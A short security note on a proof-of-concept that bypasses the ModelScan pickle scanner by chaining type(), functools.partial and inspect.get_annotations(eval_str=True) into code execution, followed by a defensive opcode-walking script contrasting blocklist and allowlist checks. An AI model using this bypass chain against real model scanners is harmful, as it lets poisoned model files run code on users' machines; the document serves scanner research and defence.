ModelScan Bypass PoC: inspect.get_annotations() + functools.partial() + builtins.type()
This bypass uses a 4-step chain of completely unblocked standard library functions:
ns = {"__annotations__": {"x": PAYLOAD}}
cls = builtins.type("X", (), ns)  # type: not in blocklist
p = functools.partial(get_annotations, eval_str=True)  # functools, inspect: not in blocklist
p(cls)  # -> eval(PAYLOAD) -> REMOTE CODE EXECUTION
Size: 214 bytes (.pkl) / 235 bytes (.joblib)
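Why a name blocklist misses this chain while an allowlist catches it, as an added example (not part of the original PoC and not ModelScan's code): a static `pickletools` opcode walk that lists every global a pickle would import, without unpickling it. The blocklist and allowlist contents, the function names, and the sample bytes are constructed for illustration.

```python
import functools
import pickle
import pickletools

# Constructed stand-in blocklist for illustration; NOT ModelScan's real list.
BLOCKLIST = {("os", "system"), ("builtins", "eval"), ("builtins", "exec")}
# Assumed allowlist: the only globals this deployment expects in a model file.
ALLOWLIST = {("collections", "OrderedDict"), ("numpy", "ndarray"), ("numpy", "dtype")}

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
MEMO_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}
UNRESOLVED = ("<unresolved>", "<unresolved>")


def imported_globals(data: bytes):
    """List (module, name) pairs a pickle would import, without unpickling it."""
    found, recent = [], []  # recent: string args of preceding opcodes, else None
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            pair = recent[-2:]
            # Fail closed when the two operands are not plain string pushes.
            found.append(tuple(pair) if len(pair) == 2 and None not in pair else UNRESOLVED)
        if op.name not in MEMO_OPS:
            recent.append(arg if op.name in STRING_OPS else None)
    return found


def blocklist_hits(data: bytes):
    """Globals that a deny-by-name scanner would flag."""
    return [g for g in imported_globals(data) if g in BLOCKLIST]


def allowlist_violations(data: bytes):
    """Globals that are not explicitly expected; any entry means reject the file."""
    return [g for g in imported_globals(data) if g not in ALLOWLIST]


# Constructed, inert samples: they only reference the callables, nothing is called.
SAMPLE_P0 = b"(cbuiltins\ntype\ncfunctools\npartial\ncinspect\nget_annotations\nt."
SAMPLE_P4 = pickle.dumps((type, functools.partial), protocol=4)
PLAIN_DATA = pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)

if __name__ == "__main__":
    for label, blob in [("p0", SAMPLE_P0), ("p4", SAMPLE_P4), ("plain", PLAIN_DATA)]:
        print(label, "blocklist:", blocklist_hits(blob), "allowlist:", allowlist_violations(blob))
```

The `STACK_GLOBAL` handling is a heuristic that reports `<unresolved>` when operands come from the memo or other opcodes, so such files are rejected rather than passed.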